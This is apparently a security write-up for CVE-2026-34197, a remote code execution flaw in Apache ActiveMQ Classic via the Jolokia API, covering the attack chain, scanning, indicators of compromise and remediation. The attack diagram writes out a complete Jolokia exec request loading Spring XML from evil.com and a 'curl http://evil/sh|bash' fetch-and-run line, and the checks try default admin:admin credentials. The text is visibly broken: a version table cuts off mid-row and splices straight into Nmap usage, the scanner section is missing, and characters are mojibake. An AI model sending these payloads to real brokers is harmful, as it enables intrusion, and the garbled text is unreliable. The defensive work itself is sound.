## https://sploitus.com/exploit?id=56846A38-EC30-580B-86FD-E20F8957A43F
# CVE-2026-34197 β Apache ActiveMQ Classic RCE via Jolokia API
## TL;DR
A **remote code execution** vulnerability in **Apache ActiveMQ Classic** that allows an attacker to execute arbitrary code by invoking the `addNetworkConnector(String)` MBean operation through the Jolokia API (`/api/jolokia/`). The attacker embeds a malicious `brokerConfig` parameter pointing to a remote Spring XML file, which ActiveMQ fetches and parses, instantiating arbitrary Java objects and achieving code execution.
On **ActiveMQ versions 6.0.0 through 6.1.1**, the Jolokia endpoint is **completely unauthenticated**, making this a zero-click unauthenticated RCE.
This vulnerability was hidden in the codebase for **13 years** before discovery with AI assistance.
---
## Table of Contents
- [Quick Facts](#quick-facts)
- [What is Apache ActiveMQ?](#what-is-apache-activemq)
- [Vulnerability Deep Dive](#vulnerability-deep-dive)
- [The Architecture: Jolokia and JMX](#the-architecture-jolokia-and-jmx)
- [The Attack Chain](#the-attack-chain)
- [The Authentication Gap](#the-authentication-gap)
- [Impact Analysis](#impact-analysis)
- [Affected Versions](#affected-versions)
- [Detection](#detection)
- [Python Scanner](#python-scanner)
- [Nmap NSE Script](#nmap-nse-script)
- [Manual Verification](#manual-verification)
- [Indicators of Compromise](#indicators-of-compromise)
- [Remediation](#remediation)
- [References](#references)
- [Author](#author)
---
## Quick Facts
| Field | Detail |
|-------|--------|
| **CVE ID** | CVE-2026-34197 |
| **Vendor** | Apache Software Foundation |
| **Product** | Apache ActiveMQ Classic |
| **Affected Versions** | All versions before 5.19.4 and 6.2.3 |
| **Unauthenticated RCE** | Versions 6.0.0 through 6.1.1 (Jolokia has no auth) |
| **CVSS v3.1** | 8.8 (High) |
| **CWE** | CWE-94 β Improper Control of Generation of Code |
| **Attack Vector** | Network |
| **Authentication** | Required on 5.x; **none** on 6.0.0 to 6.1.1 |
| **User Interaction** | None |
| **Exploit Maturity** | Public PoC available |
| **Patched In** | ActiveMQ Classic 5.19.4, 6.2.3 |
| **Age of Bug** | ~13 years in the codebase |
| **Discovery** | AI-assisted vulnerability research |
---
## What is Apache ActiveMQ?
Apache ActiveMQ Classic is one of the most widely deployed open-source message brokers in the Java ecosystem. It implements the Java Message Service (JMS) specification and serves as the backbone of asynchronous communication in thousands of enterprise environments worldwide.
ActiveMQ handles everything from order processing queues and financial transaction pipelines to IoT telemetry streams and microservice event buses. If your organization uses Java-based microservices, event-driven architecture, or any form of asynchronous messaging, there's a good chance ActiveMQ is somewhere in the stack.
```
ActiveMQ Broker
βββββββββββββββββββββββββ
β β
ββββββββββββ β βββββββββββββββββ β ββββββββββββ
β Producer βββββββββΆβ β Message β βββββββββΆβ Consumer β
β (App A) β send β β Queue / β β recv β (App B) β
ββββββββββββ β β Topic β β ββββββββββββ
β βββββββββββββββββ β
ββββββββββββ β β ββββββββββββ
β Producer βββββββββΆβ βββββββββββββββββ βββββββββΆβ Consumer β
β (App C) β β β Jolokia β β β (App D) β
ββββββββββββ β β API (:8161) β β ββββββββββββ
β βββββββββ¬ββββββββ β
βββββββββββββΌββββββββββββ
β
β οΈ CVE-2026-34197
Attack surface here
```
When an attacker compromises ActiveMQ, they don't just get a shell on one server. They sit in the **center of every message flow** in the organization, able to read, modify, redirect, or inject messages between critical systems.
---
## Vulnerability Deep Dive
### The Architecture: Jolokia and JMX
**JMX** (Java Management Extensions) is the standard management interface for Java applications. It exposes "MBeans" (Managed Beans) that allow monitoring and control of the application internals. ActiveMQ exposes MBeans for managing brokers, queues, topics, connections, and more.
**Jolokia** is a JMX-over-HTTP bridge. It translates JMX operations into a RESTful JSON API, making it possible to manage Java applications through HTTP requests rather than requiring a dedicated JMX client.
ActiveMQ Classic ships with Jolokia built in, accessible at `/api/jolokia/` on the web console port (default: 8161).
```
Traditional JMX Access:
ββββββββββββ ββββββββββββββββ
β JConsole β ββββββ JMX Protocol βββββββββ> β ActiveMQ β
β β (requires JMX client) β MBeans β
ββββββββββββ ββββββββββββββββ
Jolokia HTTP Access:
ββββββββββββ ββββββββββββββββ
β curl / β ββ POST /api/jolokia/ βββββββ> β ActiveMQ β
β browser β (just needs HTTP) β MBeans β
ββββββββββββ ββββββββββββββββ
β¬οΈ
Anyone with HTTP access can
invoke MBean operations
```
This is where the trouble starts. Jolokia exposes the full power of JMX management through a simple HTTP API. And one of the MBean operations available on the broker is `addNetworkConnector(String)`.
### The Attack Chain
The `addNetworkConnector(String)` operation is designed to create network bridges between ActiveMQ broker instances. It accepts a URI string describing how to connect to another broker.
ActiveMQ supports a `vm://` URI scheme for in-process broker connections. These URIs support a `brokerConfig` parameter that points to a Spring XML configuration file. And Spring XML can instantiate arbitrary Java objects.
Here's the full chain:
```
Step 1: Attacker sends POST to /api/jolokia/
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β POST /api/jolokia/ β
β { β
β "type": "exec", β
β "mbean": "org.apache.activemq:type=Broker,brokerName= β
β localhost", β
β "operation": "addNetworkConnector", β
β "arguments": [ β
β "vm://b?brokerConfig=xbean:http://evil.com/pwn.xml" β
β ] β
β } β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
βΌ
Step 2: ActiveMQ parses the vm:// URI
Sees brokerConfig=xbean:http://evil.com/pwn.xml
β
βΌ
Step 3: ActiveMQ fetches http://evil.com/pwn.xml
(outbound HTTP request from the broker)
β
βΌ
Step 4: The XML is parsed as Spring configuration
Spring instantiates beans defined in the XML
β
βΌ
Step 5: Malicious bean executes arbitrary Java code
ββββββββββββββββββββββββββββββββββββββββββββ
β β
β β
β β
β /bin/bash β
β -c β
β curl http://evil/sh|bash β
β β
β β
β β
β β
ββββββββββββββββββββββββββββββββββββββββββββ
```
ActiveMQ is doing exactly what it was designed to do: loading a broker configuration. The problem is that the configuration source is controlled by the attacker, and Spring XML is effectively a code execution format.
### The Authentication Gap
This is what elevates the vulnerability from serious to critical:
| ActiveMQ Version | Jolokia Auth Status | Impact |
|:---:|:---:|:---:|
| 5.x (
# Scan a subnet
nmap -p 8161 --script CVE-2026-34197_ActiveMQ_Jolokia 10.0.0.0/24
# Multiple common ports
nmap -p 8161,61616,443,8080 --script CVE-2026-34197_ActiveMQ_Jolokia
# Scan targets from a file
nmap -p 8161 --script CVE-2026-34197_ActiveMQ_Jolokia -iL targets.txt
# With service version detection
nmap -sV -p 8161 --script CVE-2026-34197_ActiveMQ_Jolokia
```
**Example Nmap output:**
```
PORT STATE SERVICE
8161/tcp open http
| CVE-2026-34197_ActiveMQ_Jolokia:
| VULNERABLE:
| Apache ActiveMQ Jolokia RCE (CVE-2026-34197)
| State: VULNERABLE
| Risk level: CRITICAL
| ActiveMQ Version: 6.1.0
| Jolokia Accessible: true (unauthenticated)
| Description:
| CRITICAL: Jolokia API is accessible without authentication on
| ActiveMQ 6.1.0, enabling unauthenticated remote code execution
| via addNetworkConnector MBean.
| References:
|_ https://nvd.nist.gov/vuln/detail/CVE-2026-34197
```
### Manual Verification
If you want to check manually with `curl`:
```bash
# Step 1: Check if Jolokia is accessible (should return JSON if open)
curl -sk http://:8161/api/jolokia/ | python3 -m json.tool
# Step 2: Check with default credentials (if Step 1 returns 401)
curl -sk -u admin:admin http://:8161/api/jolokia/ | python3 -m json.tool
# Step 3: Check MBean accessibility (safe read-only query)
curl -sk http://:8161/api/jolokia/search/org.apache.activemq:type=Broker,brokerName=* \
| python3 -m json.tool
```
If Step 1 returns a JSON response with Jolokia agent info, the endpoint is unauthenticated. If Step 2 works with default creds, you have authenticated access. Either way, if the broker MBean is accessible, the exploit path exists.
---
## Indicators of Compromise
Watch for these signs in your environment:
| Indicator | Where to Check | What to Look For |
|:---|:---|:---|
| Jolokia access | Web console access logs | POST to `/api/jolokia/` containing `addNetworkConnector` |
| Outbound fetch | Network logs / firewall | HTTP requests from ActiveMQ to unexpected external hosts |
| Spring XML loading | ActiveMQ logs | References to `xbean:http://` URIs |
| Network connectors | Broker configuration | `vm://` URIs with `brokerConfig` parameters you didn't create |
| Child processes | Process monitoring | Unexpected processes spawned by the ActiveMQ Java process |
**Investigation commands:**
```bash
# Check ActiveMQ logs for suspicious Jolokia operations
grep -r "addNetworkConnector\|brokerConfig\|xbean:http" /var/log/activemq/
# Check for unexpected network connectors in running broker
curl -sk http://:8161/api/jolokia/read/org.apache.activemq:type=Broker,brokerName=localhost/NetworkConnectors
# Monitor for unexpected outbound connections from the ActiveMQ process
ss -tnp | grep java
# Check for unexpected child processes
ps aux --forest | grep -A5 activemq
```
---
## Remediation
**Immediate actions (do these now):**
1. **Upgrade ActiveMQ Classic** to version **5.19.4** or **6.2.3** (depending on your branch)
2. **Restrict Jolokia access** by adding firewall rules or reverse proxy ACLs to block external access to `/api/jolokia/`
3. **Change default credentials** if you're running `admin:admin` on the web console
**Short-term (this week):**
4. **Audit Jolokia access logs** for signs of exploitation (look for `addNetworkConnector` operations)
5. **Review network connectors** on all ActiveMQ instances for unauthorized entries
6. **Check for unexpected outbound connections** from ActiveMQ broker hosts
7. **Rotate credentials** for any services that connect through the broker
**Long-term:**
8. **Network segmentation** for message broker infrastructure (dedicated management VLAN)
9. **Monitoring** for Jolokia access patterns with alerting on unexpected MBean operations
10. **Include ActiveMQ** in regular vulnerability scanning and patch management cycles
11. **Disable Jolokia** entirely if JMX management is not needed, or bind it to localhost only
---
## References
- [Horizon3.ai β CVE-2026-34197 ActiveMQ RCE via Jolokia API](https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/)
- [SecurityWeek β RCE Bug Lurked in Apache ActiveMQ Classic for 13 Years](https://www.securityweek.com/rce-bug-lurked-in-apache-activemq-classic-for-13-years/)
- [Help Net Security β Apache ActiveMQ RCE Vulnerability CVE-2026-34197](https://www.helpnetsecurity.com/2026/04/09/apache-activemq-rce-vulnerability-cve-2026-34197-claude/)
- [CSO Online β Claude Uncovers a 13-year-old ActiveMQ RCE Bug](https://www.csoonline.com/article/4157146/claude-uncovers-a-13-year-old-activemq-rce-bug-within-minutes.html)
- [CCB Belgium β Warning: High Severity Vulnerability in Apache ActiveMQ](https://ccb.belgium.be/advisories/warning-high-severity-vulnerability-apache-activemq-patch-immediately)
- [CSA Singapore β Critical Vulnerability in Apache ActiveMQ Classic](https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2026-034/)
- [GBHackers β Claude Identifies Critical 13-Year-Old RCE Vulnerability](https://gbhackers.com/claude-identifies-critical-13-year-old-rce-vulnerability-in-apache-activemq/)
---
## Author
**Kerem OruΓ§** β Cybersecurity Engineer
- GitHub: [@keraattin](https://github.com/keraattin)
- Twitter: [@keraattin](https://twitter.com/keraattin)